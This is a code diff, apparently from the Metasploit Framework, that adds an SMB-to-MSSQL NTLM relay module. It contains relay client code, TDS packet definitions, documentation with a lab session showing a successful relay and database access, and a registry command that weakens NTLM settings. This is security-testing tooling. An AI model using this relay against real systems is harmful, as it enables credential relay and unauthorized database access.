Add an SMB to MSSQL NTLM Relay module

documentation/modules/auxiliary/scanner/mssql/mssql_hashdump.md

@@ -9,9 +9,19 @@ msf auxiliary(scanner/mssql/mssql_hashdump) > options
 
 Module options (auxiliary/scanner/mssql/mssql_hashdump):
 
-   Name                 Current Setting  Required  Description
-   ----                 ---------------  --------  -----------
-   USE_WINDOWS_AUTHENT  false            yes       Use windows authentication (requires DOMAIN option set)
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CHOST                     no        The local client address
+   CPORT                     no        The local client port
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5
+                                       h
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
 
 
    Used when making a new connection via RHOSTS:
@@ -24,13 +34,6 @@ Module options (auxiliary/scanner/mssql/mssql_hashdump):
    RPORT     1433             no        The target port (TCP)
    THREADS   1                yes       The number of concurrent threads (max one per host)
    USERNAME  MSSQL            no        The username to authenticate as
-
-
-   Used when connecting via an existing SESSION:
-
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SESSION                   no        The session to run this module on
 ```
 
 ## Scenarios

documentation/modules/auxiliary/scanner/mssql/mssql_login.md

@@ -223,7 +223,6 @@ Module options (auxiliary/scanner/mssql/mssql_login):
    USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
    USER_AS_PASS         false            no        Try the username as the password for all users
    USER_FILE                             no        File containing usernames, one per line
-   USE_WINDOWS_AUTHENT  false            yes       Use windows authentication (requires DOMAIN option set)
    VERBOSE              true             yes       Whether to print output for all attempts
 
 

documentation/modules/auxiliary/server/relay/smb_to_ldap.md

@@ -52,7 +52,7 @@ flowchart LR
 ```
 
 The Domain Computer will need to be configured to use NTLMv1 by setting the
-following registry key to a value less or equal to 2:
+following registry key to a value less than or equal to 2:
 
 ```
 PS > reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel /t REG_DWORD /d 0x2 /f
@@ -95,7 +95,7 @@ I.E. the filename john will produce two files, `john_netntlm` and `john_netntlmv
 ### RELAY_TIMEOUT
 
 Seconds that the relay socket will wait for a response after the client has
-initiated communication (default 25 sec.).
+initiated communication.
 
 ### SMBDomain
 

documentation/modules/auxiliary/server/relay/smb_to_mssql.md

@@ -0,0 +1,80 @@
+## Vulnerable Application
+
+This module supports running an SMB server which validates credentials, and then attempts to execute a relay attack
+against an MSSQL server on the configured RHOSTS hosts.
+
+If the relay succeeds, an MSSQL session to the target will be created. This can be used by any modules that support
+MSSQL sessions, like `admin/mssql/mssql_enum`. The session can also be used to run arbitrary queries.
+
+Supports SMBv2, SMBv3, and captures NTLMv1 as well as NTLMv2 hashes.
+SMBv1 is not supported - please see https://github.com/rapid7/metasploit-framework/issues/16261
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install MSSQL Server on a Domain Joined host. Ensure that Windows Authentication mode is enabled.
+2. Start msfconsole, and use the module.
+3. Set `RHOSTS` to target the MSSQL server.
+4. On another host, use `net use` to trigger an authentication attempt to metasploit that can be relayed to the target.
+
+## Options
+
+### RHOSTS
+
+Target address range or CIDR identifier to relay to.
+
+### CAINPWFILE
+
+A file to store Cain & Abel formatted captured hashes in. Only supports NTLMv1 Hashes.
+
+### JOHNPWFILE
+
+A file to store John the Ripper formatted hashes in. NTLMv1 and NTLMv2 hashes
+will be stored in separate files.
+I.E. the filename john will produce two files, `john_netntlm` and `john_netntlmv2`.
+
+### RELAY_TIMEOUT
+
+Seconds that the relay socket will wait for a response after the client has
+initiated communication.
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### MSSQL Server 2019
+
+```
+[*] Auxiliary module running as background job 0.
+[*] SMB Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+msf auxiliary(server/relay/smb_to_mssql) > 
+[*] New request from 192.168.159.10
+[*] Received request for MSFLAB\smcintyre
+[*] Relaying to next target mssql://192.168.159.166:1433
+[+] Identity: MSFLAB\smcintyre - Successfully authenticated against relay target mssql://192.168.159.166:1433
+[+] Relay succeeded
+[*] MSSQL session 1 opened (192.168.159.128:35967 -> 192.168.159.166:1433) at 2025-10-21 09:33:19 -0400
+[*] Received request for MSFLAB\smcintyre
+[*] Identity: MSFLAB\smcintyre - All targets relayed to
+[*] New request from 192.168.159.10
+[*] Received request for MSFLAB\smcintyre
+[*] Identity: MSFLAB\smcintyre - All targets relayed to
+[*] Received request for MSFLAB\smcintyre
+[*] Identity: MSFLAB\smcintyre - All targets relayed to
+
+msf auxiliary(server/relay/smb_to_mssql) > sessions -i -1
+[*] Starting interaction with 1...
+
+mssql @ 192.168.159.166:1433 (master) > query 'SELECT @@version'
+Response
+========
+
+    #  NULL
+    -  ----
+    0  Microsoft SQL Server 2019 (RTM-GDR) (KB5065223) - 15.0.2145.1 (X64) 
+    Aug 13 2025 11:31:46 
+    Copyright (C) 2019 Microsoft Corporation
+    Standard Edition (64-bit) on Windows Server 2025 Standard 10.0 <X64> (Build 26100: ) (Hypervisor)
+
+mssql @ 192.168.159.166:1433 (master) > 
+```

lib/metasploit/framework/login_scanner/mssql.rb

@@ -16,22 +16,19 @@ class MSSQL
         include Metasploit::Framework::LoginScanner::NTLM
 
         DEFAULT_PORT         = 1433
-        DEFAULT_REALM         = 'WORKSTATION'
+        DEFAULT_REALM        = nil
         # Lifted from lib/msf/core/exploit/mssql.rb
         LIKELY_PORTS         = [ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ]
         # Lifted from lib/msf/core/exploit/mssql.rb
         LIKELY_SERVICE_NAMES = [ 'ms-sql-s', 'ms-sql2000', 'sybase', 'mssql' ]
         PRIVATE_TYPES        = [ :password, :ntlm_hash ]
-        REALM_KEY           = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+        REALM_KEY            = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
 
         # @!attribute auth
         #   @return [Array<String>] Auth The Authentication mechanism to use
         #   @see Msf::Exploit::Remote::AuthOption::MSSQL_OPTIONS
         attr_accessor :auth
 
-        validates :auth,
-                  inclusion: { in: Msf::Exploit::Remote::AuthOption::MSSQL_OPTIONS }
-
         validates :auth,
                   inclusion: { in: Msf::Exploit::Remote::AuthOption::MSSQL_OPTIONS }
 
@@ -43,10 +40,6 @@ class MSSQL
         #   @return [String] Auth The mssql hostname, required for Kerberos Authentication
         attr_accessor :hostname
 
-        # @!attribute windows_authentication
-        #   @return [Boolean] Whether to use Windows Authentication instead of SQL Server Auth.
-        attr_accessor :windows_authentication
-
         # @!attribute use_client_as_proof
         #   @return [Boolean] If a login is successful and this attribute is true - an MSSQL::Client instance is used as proof
         attr_accessor :use_client_as_proof
@@ -59,9 +52,6 @@ class MSSQL
         #   @return [Integer] The delay between sending packets
         attr_accessor :send_delay
 
-        validates :windows_authentication,
-          inclusion: { in: [true, false] }
-
         attr_accessor :tdsencryption
 
         validates :tdsencryption,
@@ -93,7 +83,7 @@ def attempt_login(credential)
             result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
             result_options[:proof] = e
           rescue => e
-            elog(e)
+            elog(e, error: e)
             result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
             result_options[:proof] = e
           end
@@ -117,7 +107,6 @@ def set_sane_defaults
           self.use_ntlm2_session      = true if self.use_ntlm2_session.nil?
           self.use_ntlmv2             = true if self.use_ntlmv2.nil?
           self.auth                   = Msf::Exploit::Remote::AuthOption::AUTO if self.auth.nil?
-          self.windows_authentication = false if self.windows_authentication.nil?
           self.tdsencryption          = false if self.tdsencryption.nil?
         end
       end

lib/msf/core/auxiliary/auth_brute.rb

@@ -729,7 +729,7 @@ def build_brute_message(host_ip,host_port,proto,msg)
     else
       complete_message = ''
       unless ip.blank? && port.blank?
-        complete_message << "#{ip}:#{port}"
+        complete_message << Rex::Socket.to_authority(ip, port).ljust(21)
       else
         complete_message << proto || 'Bruteforce'
       end

lib/msf/core/exploit/remote/mssql.rb

@@ -37,15 +37,14 @@ def initialize(info = {})
         Opt::RPORT(1433),
         OptString.new('USERNAME', [ false, 'The username to authenticate as', 'sa']),
         OptString.new('PASSWORD', [ false, 'The password for the specified username', '']),
-        OptBool.new('USE_WINDOWS_AUTHENT', [ true, 'Use windows authentication (requires DOMAIN option set)', false]),
         # OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', false]), - TODO: support TDS Encryption
       ], Msf::Exploit::Remote::MSSQL)
     register_advanced_options(
       [
         OptPath.new('HEX2BINARY',   [ false, "The path to the hex2binary script on the disk",
           File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
         ]),
-        OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'], aliases: ['MssqlDomain']),
+        OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', ''], aliases: ['MssqlDomain']),
         *kerberos_storage_options(protocol: 'Mssql'),
         *kerberos_auth_options(protocol: 'Mssql', auth_methods: Msf::Exploit::Remote::AuthOption::MSSQL_OPTIONS),
       ], Msf::Exploit::Remote::MSSQL)

lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb

@@ -232,6 +232,8 @@ def create_relay_client(target, timeout)
         client = Target::SMB::Client.create(self, target, logger, timeout)
       when :ldap
         client = Target::LDAP::Client.create(self, target, logger, timeout)
+      when :mssql
+        client = Target::MSSQL::Client.create(self, target, logger, timeout, framework_module: @listener)
       else
         raise RuntimeError, "unsupported protocol: #{target.protocol}"
       end

lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb

@@ -0,0 +1,82 @@
+module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::MSSQL
+  class Client < Rex::Proto::MSSQL::Client
+    attr_reader :target
+
+    def initialize(framework_module, proxies = nil, provider: nil, target: nil, logger: nil, timeout: 30)
+      @logger = logger
+      @provider = provider
+      @target = target
+      @timeout = timeout
+      super(framework_module, framework_module.framework, target.ip, target.port, proxies)
+    end
+
+    def self.create(provider, target, logger, timeout, framework_module:)
+      new(
+        framework_module,
+        provider: provider,
+        target: target,
+        logger: logger,
+        timeout: timeout
+      )
+    end
+
+
+    # @param [String] client_type1_msg
+    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    def relay_ntlmssp_type1(client_type1_msg)
+      self.initial_connection_info[:prelogin_data] = mssql_prelogin
+
+      pkt_hdr = MsTdsHeader.new(
+        packet_type: MsTdsType::TDS7_LOGIN,
+        packet_id: 1
+      )
+
+      pkt_body = MsTdsLogin7.new(
+        option_flags_2: {
+          f_int_security: 1
+        },
+        server_name: @target.ip
+      )
+
+      pkt_body.sspi = client_type1_msg.bytes
+
+      pkt_hdr.packet_length += pkt_body.num_bytes
+      pkt = pkt_hdr.to_binary_s + pkt_body.to_binary_s
+
+      resp = mssql_send_recv(pkt, @timeout, false)
+      server_type2_message = resp[3..-1]
+
+      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
+        message: Net::NTLM::Message.parse(server_type2_message),
+        nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
+      )
+    end
+
+    # @param [String] client_type3_msg
+    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    def relay_ntlmssp_type3(client_type3_msg)
+      pkt_hdr = MsTdsHeader.new(
+        type: MsTdsType::SSPI_MESSAGE,
+        packet_id: 1
+      )
+
+      pkt_hdr.packet_length += client_type3_msg.length
+      pkt = pkt_hdr.to_binary_s + client_type3_msg
+
+      resp = mssql_send_recv(pkt)
+      info = mssql_parse_reply(resp)
+      if info[:login_ack]
+        nt_status = WindowsError::NTStatus::STATUS_SUCCESS
+      else
+        nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
+      end
+
+      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
+    end
+
+    protected
+
+    attr_reader :logger
+  end
+end
+

lib/msf/core/optional_session/mssql.rb

@@ -26,8 +26,8 @@ def initialize(info = {})
           register_options(
             [
               Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
-              Msf::OptString.new('DATABASE', [ false, 'The database to authenticate against', 'MSSQL']),
-              Msf::OptString.new('USERNAME', [ false, 'The username to authenticate as', 'MSSQL']),
+              Msf::OptString.new('DATABASE', [ false, 'The database to authenticate against', '']),
+              Msf::OptString.new('USERNAME', [ false, 'The username to authenticate as', 'sa']),
               Msf::Opt::RHOST(nil, false),
               Msf::Opt::RPORT(1433, false)
             ]

lib/rex/proto/ms_tds.rb

@@ -0,0 +1,8 @@
+module Rex::Proto::MsTds
+  require 'rex/proto/ms_tds/ms_tds_type'
+  require 'rex/proto/ms_tds/ms_tds_status'
+  require 'rex/proto/ms_tds/ms_tds_version'
+  require 'rex/proto/ms_tds/ms_tds_header'
+  require 'rex/proto/ms_tds/ms_tds_login7_password'
+  require 'rex/proto/ms_tds/ms_tds_login7'
+end

lib/rex/proto/ms_tds/ms_tds_header.rb

@@ -0,0 +1,16 @@
+# -*- coding: binary -*-
+
+require 'bindata'
+
+module Rex::Proto::MsTds
+  class MsTdsHeader < BinData::Record
+    endian :big
+
+    ms_tds_type    :packet_type
+    ms_tds_status  :status, initial_value: MsTdsStatus::END_OF_MESSAGE
+    uint16         :packet_length, initial_value: 8
+    uint16         :spid
+    uint8          :packet_id
+    uint8          :window
+  end
+end